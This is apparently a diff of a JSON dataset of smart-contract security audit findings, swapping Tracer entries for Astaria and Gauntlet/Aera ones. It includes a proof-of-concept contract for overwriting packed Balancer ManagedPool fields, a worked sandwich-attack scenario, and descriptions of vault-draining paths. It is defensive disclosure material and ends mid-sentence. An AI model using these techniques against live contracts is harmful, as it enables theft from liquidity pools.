* @dev If the backing array is full (i.e., `length() == capacity()`), then * it is rotated such that the oldest price observation is deleted function add(int256 x) external override onlyWriter returns (bool) { ... if (full()) { leftRotateWithPad(x); ... } function leftRotateWithPad(int256 x) private { uint256 n = length(); /* linear scan over the [1, n] subsequence */ for (uint256 i = 1; i < n; i++) { observations[i - 1] = observations[i]; } ... } contract SMAOracle is IOracleWrapper { * @dev O(k) complexity due to linear traversal of the final `k` elements of `xs` ... function SMA(int256[24] memory xs, uint256 n, uint256 k) public pure returns (int256) { ... /* linear scan over the [n - k, n] subsequence */ for (uint256 i = n - k; i < n; i++) { S += xs[i]; } ... } }", + "title": "tokenURI should revert on non-existing tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "As per the ERC721 standard, tokenURI() needs to revert if tokenId doesn't exist. The current code returns an empty string for all inputs.", "labels": [ "Spearbit", - "Tracer", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "Unused observer state variable in PoolKeeper", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "There is no use for the observer state variable. It is only used in performUpkeepSinglePool in a require statement to check if it is set. address public observer; function setPriceObserver(address _observer) external onlyOwner { ... observer = _observer; ... function performUpkeepSinglePool(...) require(observer != address(0), \"Observer not initialized\"); ...", + "title": "Inheriting the same contract twice", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "VaultImplementation inherits from AstariaVaultBase (reference). Hence, there is no need to inherit AstariaVaultBase in the Vault and PublicVault contracts as they both inherit VaultImplementation already.", "labels": [ "Spearbit", - "Tracer", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "Usage of temporary variable instead of type casting in PoolKeeper.performUpkeepSinglePool()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The pool temporary variable is used to cast the address to ILeveragedPool. Casting the address directly where the pool variable is used saves gas, as _pool is calldata.", + "title": "No need to re-cast variables", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Code above highlights redundant type castings. ERC721 CT = ERC721(address(COLLATERAL_TOKEN())); ... address(msg.sender) These type castings are casting variables to the same type.", "labels": [ "Spearbit", - "Tracer", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "Events and event emissions can be optimized", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "1. Having a single DeployCommitter event emitted after setQuoteAndPool() in PoolFactory.deployPool() would result in better UX/event tracking and alignment with the current behavior of emitting events during the Factory deployment. 2.
Removing the QuoteAndPoolChanged event that is emitted only once during the lifetime of the PoolCommitter during PoolFactory.deployPool(). 3. Removing the ChangeIntervalSet emission in PoolCommitter.initialize(). The changeInterval has not really changed, it was initialized. This can be tracked by the DeployCommitter event.", + "title": "Comments do not match implementation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": " Scenario 1 & 2: Comments note where each parameter ends in a packed byte array, or parameter width in bytes. The comments are outdated. Scenario 3: The unless case is not implemented.", "labels": [ "Spearbit", - "Tracer", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "Multi-paid claim rewards should be sent only if nonzero", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "In both multiPaidClaimMultiplePoolCommitters() and multiPaidClaimSinglePoolCommitter(), there could be cases where the reward sent back to the claimer is zero. In these scenarios, the reward value should be checked to avoid wasting gas.", + "title": "Incomplete Natspec", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": " LienToken.sol#L616 s, @return missing LienToken.sol#L738-L750 s, position, @return missing CollateralToken.sol#L616-L628 tokenId_ missing VaultImplementation.sol#L153-L165 The second * on /** is missing, causing the compiler to ignore the Natspec. The Natspec appears to document an old function interface. Params do not match with the function inputs. VaultImplementation.sol#L298-L310 missing stack and return value AstariaRouter.sol#L75-L77 @param NatSpec is missing for _WITHDRAW_IMPL, _BEACON_PROXY_IMPL and _CLEARING_HOUSE_IMPL AstariaRouter.sol#L44-L47 : Leave a comment that AstariaRouter also acts as an IBeacon for different cloned contracts.", "labels": [ - "Spearbit", - "Tracer", - "Severity: Gas Optimization" + "Spearbit", + "Astaria", + "Severity: Informational" ] }, { - "title": "Unnecessary quad arithmetic use where integer arithmetic works", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The ABDKMathQuad library is used to compute a division which is then truncated with toUint(). Semantically this is equivalent to a standard uint division, which is more gas efficient. The same library is also unnecessarily used to compute the keeper's reward. This can be safely done by using standard uint computation. function appropriateUpdateIntervalId(...) ... uint256 factorDifference = ABDKMathQuad.toUInt(divUInt(frontRunningInterval, updateInterval)); function keeperReward(...) ... int256 wadRewardValue = ABDKMathQuad.toInt( ABDKMathQuad.add( ABDKMathQuad.fromUInt(_keeperGas), ABDKMathQuad.div( ( ABDKMathQuad.div( (ABDKMathQuad.mul(ABDKMathQuad.fromUInt(_keeperGas), _tipPercent)), ABDKMathQuad.fromUInt(100) ) ), FIXED_POINT ) ) ); uint256 decimals = IERC20DecimalsWrapper(ILeveragedPool(_pool).quoteToken()).decimals(); uint256 deWadifiedReward = PoolSwapLibrary.fromWad(uint256(wadRewardValue), decimals);", + "title": "Cannot have multiple liens with same parameters", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Lien Ids are computed by hashing the Lien struct itself.
This means that no two liens can have the same parameters (e.g. same amount, rate, duration, etc.).", "labels": [ "Spearbit", - "Tracer", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "Custom errors should be used", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "In the latest Solidity versions it is possible to replace the strings used to encode error messages with custom errors, which are more gas efficient. Require statements with string error messages appear throughout the codebase, for example: AutoClaim.sol: require(poolFactory.isValidPoolCommitter(msg.sender), \"msg.sender not valid PoolCommitter\"); ChainlinkOracleWrapper.sol: require(answeredInRound >= roundID, \"COA: Stale answer\"); ERC20_Cloneable.sol: require(msg.sender == owner, \"msg.sender not owner\"); InvariantCheck.sol: require(poolFactory.isValidPool(poolToCheck), \"Pool is invalid\"); LeveragedPool.sol: require(msg.sender == keeper, \"msg.sender not keeper\"); PoolCommitter.sol: require(userCommit.balanceLongBurnAmount <= balance.longTokens, \"Insufficient pool tokens\"); PoolFactory.sol: require(IOracleWrapper(deploymentParameters.oracleWrapper).deployer() == msg.sender, \"Deployer must be oracle wrapper owner\"); PoolKeeper.sol: require(observer != address(0), \"Observer not initialized\"); PoolSwapLibrary.sol: require(price != 0, \"price == 0\"); PriceObserver.sol: require(msg.sender == writer, \"PO: Permission denied\"); SMAOracle.sol: require(_spotDecimals <= MAX_DECIMALS, \"SMA: Decimal precision too high\"); The full report lists every such require statement in AutoClaim.sol, ChainlinkOracleWrapper.sol, ERC20_Cloneable.sol, InvariantCheck.sol, LeveragedPool.sol, PoolCommitter.sol, PoolFactory.sol, PoolKeeper.sol, PoolSwapLibrary.sol, PriceObserver.sol and SMAOracle.sol.", + "title": "Redundant unchecked can be removed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "There are no arithmetic operations in these unchecked blocks (e.g. LienToken.sol#L264). For clarity, they can be removed.", "labels": [ "Spearbit", - "Tracer", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] },
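A minimal before/after sketch of the suggested refactor (error name hypothetical), using one of the require statements listed above:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.4; // custom errors require >=0.8.4

contract CustomErrorSketch {
    error NotKeeper(address caller); // hypothetical custom error

    address public keeper;

    // before: the revert string is stored in the bytecode and ABI-encoded on revert
    function pokeOld() external view {
        require(msg.sender == keeper, "msg.sender not keeper");
    }

    // after: reverts with a 4-byte selector plus arguments, cheaper to deploy and to revert
    function pokeNew() external view {
        if (msg.sender != keeper) revert NotKeeper(msg.sender);
    }
}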
{ - "title": "Different updateIntervals in SMAOracle and pools", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The updateIntervals for the pools and the SMAOracles are different. If the updateInterval for SMAOracle is larger than the updateInterval for poolUpkeep(), then the oracle price update could happen directly after the poolUpkeep(). It is possible to perform permissionless calls to poll(). In combination with a delayed poolUpkeep() an attacker could manipulate the timing of the SMAOracle price, because after a call to poll() it can't be called again until updateInterval has passed. contract LeveragedPool is ILeveragedPool, Initializable, IPausable { function initialize(ILeveragedPool.Initialization calldata initialization) external override initializer { ... updateInterval = initialization._updateInterval; ... } function poolUpkeep(... ) external override onlyKeeper { require(intervalPassed(), \"Update interval hasn't passed\"); ... } function intervalPassed() public view override returns (bool) { unchecked { return block.timestamp >= lastPriceTimestamp + updateInterval; } } contract SMAOracle is IOracleWrapper { constructor(..., uint256 _updateInterval, ... ) { updateInterval = _updateInterval; } function poll() external override returns (int256) { require(block.timestamp >= lastUpdate + updateInterval, \"SMA: Too early to update\"); return update(); } }", + "title": "Argument name reuse with different meaning across contracts", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "In LienToken.LienActionEncumber, receiver is the lender (the receiver of the LienToken).", "labels": [ "Spearbit", - "Tracer", + "Astaria", "Severity: Informational" ] }, { - "title": "Tight coupling between LeveragedPool and PoolCommitter", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The LeveragedPool and PoolCommitter contracts call each other back and forth. This could be optimized to make the code clearer and perhaps save some gas. Here is an example: contract LeveragedPool is ILeveragedPool, Initializable, IPausable { function poolUpkeep(...) external override onlyKeeper { ... IPoolCommitter(poolCommitter).executeCommitments(_boundedIntervals, _numberOfIntervals); ... } } contract PoolCommitter is IPoolCommitter, Initializable { function executeCommitments(...) external override onlyPool { ... uint256 lastPriceTimestamp = pool.lastPriceTimestamp(); // call to first contract uint256 updateInterval = pool.updateInterval(); // call to first contract ... } }", + "title": "Licensing conflict on inherited dependencies", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The version of the Solmate contracts that the gpl repository depends on is AGPL licensed, making the gpl repository adopt the same license.
This license is incompatible with the currently UNLICENSED Astaria related contracts.", "labels": [ "Spearbit", - "Tracer", + "Astaria", "Severity: Informational" ] }, { - "title": "Code in SMA() is hard to read", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The SMA() function checks for k being smaller than or equal to uint256(type(int256).max), a value somewhat difficult to read. Additionally, the number 24 is hardcoded. Note: This issue was also mentioned in the Runtime Verification report: B15 PriceObserver - avoid magic values function SMA( int256[24] memory xs, uint256 n, uint256 k) public pure returns (int256) { ... require(k > 0 && k <= n && k <= uint256(type(int256).max), \"SMA: Out of bounds\"); ... for (uint256 i = n - k; i < n; i++) { S += xs[i]; } ... }", + "title": "Important Balancer fields can be overwritten by EndTime", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "Balancer's ManagedPool uses 32-bit values for startTime and endTime but it does not verify that those values fit within that range. Values are stored in a 32-byte _miscData slot in BasePool via the insertUint32() function. Nevertheless, this function does not strip any excess bits, resulting in other fields stored in _miscData being overwritten. In the version that Aera Vault uses, only the \"restrict LP\" field can be overwritten, and by carefully crafting the value of endTime the \"restrict LP\" boolean can be switched off, allowing anyone to use joinPool. The Manager could cause this behavior via the updateWeightsGradually() function while the Owner could do it via enableTradingWithWeights(). Note: This issue has been reported to Balancer by the Spearbit team. contract ManagedPool is BaseWeightedPool, ReentrancyGuard { // f14de92ac443d6daf1f3a42025b1ecdb8918f22e // [ 64 bits | 119 bits | 1 bit | 32 bits | 32 bits | 7 bits | 1 bit ] // [ reserved | unused | restrict LP | end time | start time | total tokens | swap flag ] // |MSB LSB| function _startGradualWeightChange(uint256 startTime, uint256 endTime, ... ) ... { ... _setMiscData( _getMiscData().insertUint32(startTime, _START_TIME_OFFSET).insertUint32(endTime, _END_TIME_OFFSET) ); // this converts the values to 32 bits ... } } In the latest version of ManagedPool many more fields can be overwritten, including the LP flag, fee end/fee start and the swap flag: contract ManagedPool is BaseWeightedPool, AumProtocolFeeCache, ReentrancyGuard { // current version // [ 64 bits | 1 bit | 31 bits | 1 bit | 31 bits | 64 bits | 32 bits | 32 bits ] // [ swap fee | LP flag | fee end | swap flag | fee start | end swap | end wgt | start wgt ] // |MSB LSB| } The following POC shows how fields can be manipulated.
// SPDX-License-Identifier: MIT pragma solidity ^0.8.13; import \"hardhat/console.sol\"; contract checkbalancer { uint256 private constant _MASK_1 = 2**(1) - 1; uint256 private constant _MASK_31 = 2**(31) - 1; uint256 private constant _MASK_32 = 2**(32) - 1; uint256 private constant _MASK_64 = 2**(64) - 1; uint256 private constant _MASK_192 = 2**(192) - 1; // [ 64 bits | 1 bit | 31 bits | 1 bit | 31 bits | 64 bits | 32 bits | 32 bits ] // [ swap fee | LP flag | fee end | swap flag | fee start | end swap | end wgt | start wgt ] // |MSB LSB| uint256 private constant _WEIGHT_START_TIME_OFFSET = 0; uint256 private constant _WEIGHT_END_TIME_OFFSET = 32; uint256 private constant _END_SWAP_FEE_PERCENTAGE_OFFSET = 64; uint256 private constant _FEE_START_TIME_OFFSET = 128; uint256 private constant _SWAP_ENABLED_OFFSET = 159; uint256 private constant _FEE_END_TIME_OFFSET = 160; uint256 private constant _MUST_ALLOWLIST_LPS_OFFSET = 191; uint256 private constant _SWAP_FEE_PERCENTAGE_OFFSET = 192; function insertUint32(bytes32 word, uint256 value, uint256 offset) internal pure returns (bytes32) { bytes32 clearedWord = bytes32(uint256(word) & ~(_MASK_32 << offset)); return clearedWord | bytes32(value << offset); } function decodeUint31(bytes32 word, uint256 offset) internal pure returns (uint256) { return uint256(word >> offset) & _MASK_31; } function decodeUint32(bytes32 word, uint256 offset) internal pure returns (uint256) { return uint256(word >> offset) & _MASK_32; } function decodeUint64(bytes32 word, uint256 offset) internal pure returns (uint256) { return uint256(word >> offset) & _MASK_64; } function decodeBool(bytes32 word, uint256 offset) internal pure returns (bool) { return (uint256(word >> offset) & _MASK_1) == 1; } function insertBits192(bytes32 word, bytes32 value, uint256 offset) internal pure returns (bytes32) { bytes32 clearedWord = bytes32(uint256(word) & ~(_MASK_192 << offset)); return clearedWord | bytes32((uint256(value) & _MASK_192) << offset); } constructor() { bytes32 poolState; bytes32 miscData; uint startTime = 1 + 2*2**32; uint endTime = 3 + 4*2**32 + 5*2**(32+64) + 2**(32+64+31) + 6*2**(32+64+31+1) + 2**(32+64+31+1+31) + 7*2**(32+64+31+1+31+1); poolState = insertUint32(poolState, startTime, _WEIGHT_START_TIME_OFFSET); poolState = insertUint32(poolState, endTime, _WEIGHT_END_TIME_OFFSET); miscData = insertBits192(miscData, poolState, 0); console.log(\"startTime\", decodeUint32(miscData, _WEIGHT_START_TIME_OFFSET)); // 1 console.log(\"endTime\", decodeUint32(miscData, _WEIGHT_END_TIME_OFFSET)); // 3 console.log(\"endSwapFeePercentage\", decodeUint64(miscData, _END_SWAP_FEE_PERCENTAGE_OFFSET)); // 4 console.log(\"Fee startTime\", decodeUint31(miscData, _FEE_START_TIME_OFFSET)); // 5 console.log(\"Swap enabled\", decodeBool(miscData, _SWAP_ENABLED_OFFSET)); // true console.log(\"Fee endTime\", decodeUint31(miscData, _FEE_END_TIME_OFFSET)); // 6 console.log(\"AllowlistLP\", decodeBool(miscData, _MUST_ALLOWLIST_LPS_OFFSET)); // true console.log(\"Swap fee percentage\", decodeUint64(poolState, _SWAP_FEE_PERCENTAGE_OFFSET)); // 7 console.log(\"Swap fee percentage\", decodeUint64(miscData, _SWAP_FEE_PERCENTAGE_OFFSET)); // 0 due to miscData conversion } }", "labels": [ "Spearbit", - "Tracer", - "Severity: Informational" + "Gauntlet", + "Severity: Critical Risk" ] }, { - "title": "Code is chain-dependant due to fixed block time and no support for EIP-1559", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The PoolKeeper contract has several hardcoded assumptions about the chain on which it will be deployed. It has no support for EIP-1559 and doesn't use block.basefee. On Ethereum Mainnet the block time will change to 12 seconds with the ETH2 merge. The Secureum CARE-X report also has an entire discussion about other chains. contract PoolKeeper is IPoolKeeper, Ownable { ... uint256 public constant BLOCK_TIME = 13; /* in seconds */ ... /// Captures fixed gas overhead for performing upkeep that's unreachable /// by `gasleft()` due to our approach to error handling in that code uint256 public constant FIXED_GAS_OVERHEAD = 80195; ... }", + "title": "sweep function should prevent Treasury from withdrawing the pool's BPTs", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The current sweep() implementation allows the vault owner (the Treasury) to sweep any token owned by the vault, including BPTs (Balancer Pool Tokens) that have been minted by the Vault during the pool's initialDeposit() function call. The current vault implementation does not need those BPTs to withdraw funds because funds are passed directly through the AssetManager flow via withdraw()/finalize(). Being able to withdraw BPTs would allow the Treasury to: Withdraw funds without respecting the time period between initiateFinalization() and finalize() calls. Withdraw funds without respecting Validator allowance() limits. Withdraw funds without paying the manager's fee for the last withdraw(). Finalize the pool, withdrawing all funds, and sell the then-valueless BPTs on the market. Sell or rent out BPTs and withdraw() funds afterwards, thus doubling the funds. Swap fees would not be paid because the Treasury could call setManager(newManager), where the new manager is someone controlled by the Treasury, subsequently calling setSwapFee(0) to remove the swap fee, which would otherwise be applied during an exitPool() event. Note: Once the BPT is retrieved it can also be used to call exitPool(), as the mustAllowlistLPs check is ignored in exitPool().", "labels": [ "Spearbit", - "Tracer", - "Severity: Informational" + "Gauntlet", + "Severity: Critical Risk" ] }, { - "title": "ABDKQuad-related constants defined outside PoolSwapLibrary", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "Some ABDKQuad-related constants are defined outside of the PoolSwapLibrary while others are shadowing the ones defined inside the library. As all ABDKQuad-related logic is contained in the library, it's less error-prone to have all ABDKQuad-related definitions in the same file. The constant one is lowercase, while usually constants are uppercase. contract PoolCommitter is IPoolCommitter, Initializable { bytes16 public constant one = 0x3fff0000000000000000000000000000; ... // Set max minting fee to 100%.
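The fix this POC points at is a range check (or masking) before insertion; a minimal standalone sketch reusing the names from the POC above:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.13;

library SafeInsert {
    uint256 private constant _MASK_32 = 2**(32) - 1;

    // validate the value fits in 32 bits before inserting it, so an oversized
    // startTime/endTime can never spill into neighbouring packed fields
    function insertUint32Checked(bytes32 word, uint256 value, uint256 offset) internal pure returns (bytes32) {
        require(value <= _MASK_32, "OUT_OF_BOUNDS");
        bytes32 clearedWord = bytes32(uint256(word) & ~(_MASK_32 << offset));
        return clearedWord | bytes32(value << offset);
    }
}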
This is an ABDKQuad representation of 1 * 10 ** 18 bytes16 public constant MAX_MINTING_FEE = 0x403abc16d674ec800000000000000000; } library PoolSwapLibrary { /// ABDKMathQuad-formatted representation of the number one bytes16 public constant one = 0x3fff0000000000000000000000000000; }", + "title": "Manager can cause an immediate weight change", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "Balancer's ManagedPool uses 32-bit values for startTime and endTime but it does not verify that those values fit within that range. When endTime is set to 2**32 it becomes larger than startTime, so the _require(startTime <= endTime, ...) statement will not revert. When endTime is converted to 32 bits it will get a value of 0, so in _calculateWeightChangeProgress() the test if (currentTime >= endTime) ... will be true, causing the weight to immediately reach the end value. This way the Manager can cause an immediate weight change via the updateWeightsGradually() function and open arbitrage opportunities. Note: startTime is also subject to this overflow problem. Note: the same issues occur in the latest version of ManagedPool. Note: This issue has been reported to Balancer by the Spearbit team. Also see the following issues: Managed Pools are still undergoing development and may contain bugs and/or change significantly; Important fields of Balancer can be overwritten by EndTime. contract ManagedPool is BaseWeightedPool, ReentrancyGuard { function updateWeightsGradually(uint256 startTime, uint256 endTime, ... ) { ... uint256 currentTime = block.timestamp; startTime = Math.max(currentTime, startTime); _require(startTime <= endTime, Errors.GRADUAL_UPDATE_TIME_TRAVEL); // will not revert if endTime == 2**32 ... _startGradualWeightChange(startTime, endTime, _getNormalizedWeights(), endWeights, tokens); } function _startGradualWeightChange(uint256 startTime, uint256 endTime, ... ) ... { ... _setMiscData( _getMiscData().insertUint32(startTime, _START_TIME_OFFSET).insertUint32(endTime, _END_TIME_OFFSET) ); // this converts the values to 32 bits ... } function _calculateWeightChangeProgress() private view returns (uint256) { uint256 currentTime = block.timestamp; bytes32 poolState = _getMiscData(); uint256 startTime = poolState.decodeUint32(_START_TIME_OFFSET); uint256 endTime = poolState.decodeUint32(_END_TIME_OFFSET); if (currentTime >= endTime) { // will be true if endTime == (2**32) capped to 32 bits == 0 return FixedPoint.ONE; } else ... ... } }", "labels": [ "Spearbit", - "Tracer", - "Severity: Informational" + "Gauntlet", + "Severity: High Risk" ] }, { - "title": "Lack of a state to allow withdrawal of tokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "Immediately after the invariants don't hold and the pool has been paused, Governance can withdraw the collateral (quote). It might be prudent to create a separate state besides paused, such that unpause actions can't happen anymore, to indicate withdrawal intention. Note: the comment in withdrawQuote() is incorrect. The pool must be paused. /** ... * @dev Pool must not be paused // comment not accurate ... */ ...
function withdrawQuote() external onlyGov { require(paused, \"Pool is live\"); IERC20 quoteERC = IERC20(quoteToken); uint256 balance = quoteERC.balanceOf(address(this)); IERC20(quoteToken).safeTransfer(msg.sender, balance); emit QuoteWithdrawn(msg.sender, balance); }", + "title": "deposit and withdraw functions are susceptible to sandwich attacks", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "Transactions calling the deposit() function are susceptible to sandwich attacks where an attacker can extract value from deposits. A similar issue exists in the withdraw() function but the minimum check on the pool holdings limits the attack's impact. Consider the following scenario (swap fees ignored for simplicity): 1. Suppose the Balancer pool contains two tokens, WETH and DAI, and weights are 0.5 and 0.5. Currently, there is 1 WETH and 3k DAI in the pool and the WETH spot price is 3k. 2. The Treasury wants to add another 3k DAI into the Aera vault, so it calls the deposit() function. 3. The attacker front-runs the Treasury's transaction. They swap 3k DAI into the Balancer pool and get out 0.5 WETH. The weights remain 0.5 and 0.5, but because the WETH and DAI balances become 0.5 and 6k, WETH's spot price now becomes 12k. 4. Now, the Treasury's transaction adds 3k DAI into the Balancer pool and updates the weights to 0.5*1.5 : 0.5 = 0.6 : 0.4. 5. The attacker back-runs the transaction and swaps the 0.5 WETH they got in step 3 back to DAI (and recovers WETH's spot price to near but above 3k). According to the current weights, they can get 9k*(1 - 1/r) = 3.33k DAI from the pool, where r = (2^0.4)^(1/0.6) = 2^(0.4/0.6). 6. As a result the attacker profits 3.33k - 3k = 0.33k DAI.", "labels": [ "Spearbit", - "Tracer", - "Severity: Informational" + "Gauntlet", + "Severity: High Risk" ] },
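The 3.33k figure in step 5 can be checked against Balancer's weighted-pool out-given-in formula (a sketch of the arithmetic only; swap fees ignored as in the scenario, using the step-4 state of 9k DAI at weight 0.6 and 0.5 WETH at weight 0.4, with the attacker swapping in 0.5 WETH):

$$ A_{out} = B_{out}\left(1 - \left(\frac{B_{in}}{B_{in} + A_{in}}\right)^{w_{in}/w_{out}}\right) = 9000\left(1 - \left(\frac{0.5}{0.5 + 0.5}\right)^{0.4/0.6}\right) = 9000\,\bigl(1 - 2^{-2/3}\bigr) \approx 3330 \text{ DAI} $$

Here \(2^{-2/3} = 1/r\) with \(r = 2^{0.4/0.6}\), matching the report's 9k*(1 - 1/r) expression.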
{ - "title": "Undocumented frontrunning protection", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "In the deployPool() function of the PoolFactory contract, the check IOracleWrapper(deploymentParameters.oracleWrapper).deployer() == msg.sender protects against frontrunning the deployment transaction of the pool. This is because the poolCommitter, LeveragedPool and pair token instances are deployed at deterministic addresses, calculated from the values of leverageAmount, quoteToken and oracleWrapper. An attacker cannot frontrun the pool deployment because of the different msg.sender address, which causes the deployer() check to fail. Alternatively, the attacker will have a different oracleWrapper, resulting in a different pool. However, this is not obvious to a casual reader. function deployPool(PoolDeployment calldata deploymentParameters) external override returns (address) { ... require( IOracleWrapper(deploymentParameters.oracleWrapper).deployer() == msg.sender, \"Deployer must be oracle wrapper owner\" ); ... bytes32 uniquePoolHash = keccak256( abi.encode( deploymentParameters.leverageAmount, deploymentParameters.quoteToken, deploymentParameters.oracleWrapper ) ); PoolCommitter poolCommitter = PoolCommitter( Clones.cloneDeterministic(poolCommitterBaseAddress, uniquePoolHash) ); ... LeveragedPool pool = LeveragedPool(Clones.cloneDeterministic(poolBaseAddress, uniquePoolHash)); ... } function deployPairToken(... ) internal returns (address) { ... bytes32 uniqueTokenHash = keccak256( abi.encode( deploymentParameters.leverageAmount, deploymentParameters.quoteToken, deploymentParameters.oracleWrapper, direction ) ); PoolToken pairToken = PoolToken(Clones.cloneDeterministic(pairTokenBaseAddress, uniqueTokenHash)); ... }", + "title": "allowance() doesn't limit withdraw()s", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The allowance() function is meant to limit withdraw amounts. However, allowance() can only read and not alter state because its visibility is set to view. Therefore, the withdraw() function can be called on demand until the entire Vault/Pool balance has been drained, rendering the allowance() function ineffective. function withdraw(uint256[] calldata amounts) ... { ... uint256[] memory allowances = validator.allowance(); ... for (uint256 i = 0; i < tokens.length; i++) { if (amounts[i] > holdings[i] || amounts[i] > allowances[i]) { revert Aera__AmountExceedAvailable(... ); } } } // can't update state due to view function allowance() external view override returns (uint256[] memory amounts) { amounts = new uint256[](count); for (uint256 i = 0; i < count; i++) { amounts[i] = ANY_AMOUNT; } }", "labels": [ "Spearbit", - "Tracer", - "Severity: Informational" + "Gauntlet", + "Severity: High Risk" ] }, { - "title": "No event exists for users self-claiming commits", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "There is no event emitted when a user self-claims a previous commit for themselves, in contrast to claim() which does emit the PaidRequestExecution event.", + "title": "Malicious manager could cause Vault funds to be inaccessible", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The calculateAndDistributeManagerFees() function pushes tokens to the manager, and if for unknown reasons this action fails the entire Vault would be blocked and funds would become inaccessible. This occurs because the following functions depend on the execution of calculateAndDistributeManagerFees(): deposit(), withdraw(), setManager(), claimManagerFees(), initiateFinalization(), and therefore finalize() as well. Within calculateAndDistributeManagerFees() the function safeTransfer() is the riskiest and could fail under the following situations: A token with a callback is used, for example an ERC777 token, and the callback is not implemented correctly. A token with a blacklist option is used and the manager is blacklisted. For example, USDC has such blacklist functionality. Because the manager can be an unknown party, a small risk exists that the manager is malicious and their address could be blacklisted in USDC. Note: set as high risk because although the probability is very small, the impact is that Vault funds become inaccessible. function calculateAndDistributeManagerFees() internal { ... for (uint256 i = 0; i < amounts.length; i++) { tokens[i].safeTransfer(manager, amounts[i]); } }", "labels": [ "Spearbit", - "Tracer", - "Severity: Informational" + "Gauntlet", + "Severity: High Risk" ] },
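One standard mitigation for this class of issue is the pull-payment (withdrawal) pattern; a minimal sketch, not Aera's code, with hypothetical names:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

interface IERC20 {
    function transfer(address to, uint256 amount) external returns (bool);
}

contract FeeEscrowSketch {
    // manager => token => accrued fee amount
    mapping(address => mapping(address => uint256)) public owed;

    // accrue fees with no external call, so deposit()/withdraw()/finalize() can
    // never be blocked by a failing token transfer to the manager
    function _accrueFee(address manager, address token, uint256 amount) internal {
        owed[manager][token] += amount;
    }

    // the manager pulls fees in a separate transaction; a revert here only affects them
    function claimFee(address token) external {
        uint256 amount = owed[msg.sender][token];
        owed[msg.sender][token] = 0; // zero before transfer (checks-effects-interactions)
        require(IERC20(token).transfer(msg.sender, amount), "transfer failed");
    }
}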
{ - "title": "Mixups of types and scaling factors", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "There are a few findings that are related to mixups of types or scaling factors. The following types and scaling factors are used: uint (no scaling) uint (WAD scaling) ABDKMathQuad ABDKMathQuad (WAD scaling) Solidity >0.8.9's user-defined value types could be used to prevent mistakes. This will require several typecasts, but they don't add extra gas costs.", + "title": "updateWeightsGradually allows change rates to start in the past with a very high maximumRatio", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The current updateWeightsGradually is using startTime instead of the minimal start time, which should be Math.max(block.timestamp, startTime). Because internally Balancer will use startTime = Math.max(currentTime, startTime); as the startTime, this allows one to: Have a startTime in the past. Have a targetWeights[i] higher than allowed. We also suggest adding another check to prevent startTime > endTime. Although Balancer replicates the same check, it is still needed in the Aera implementation to prevent transactions 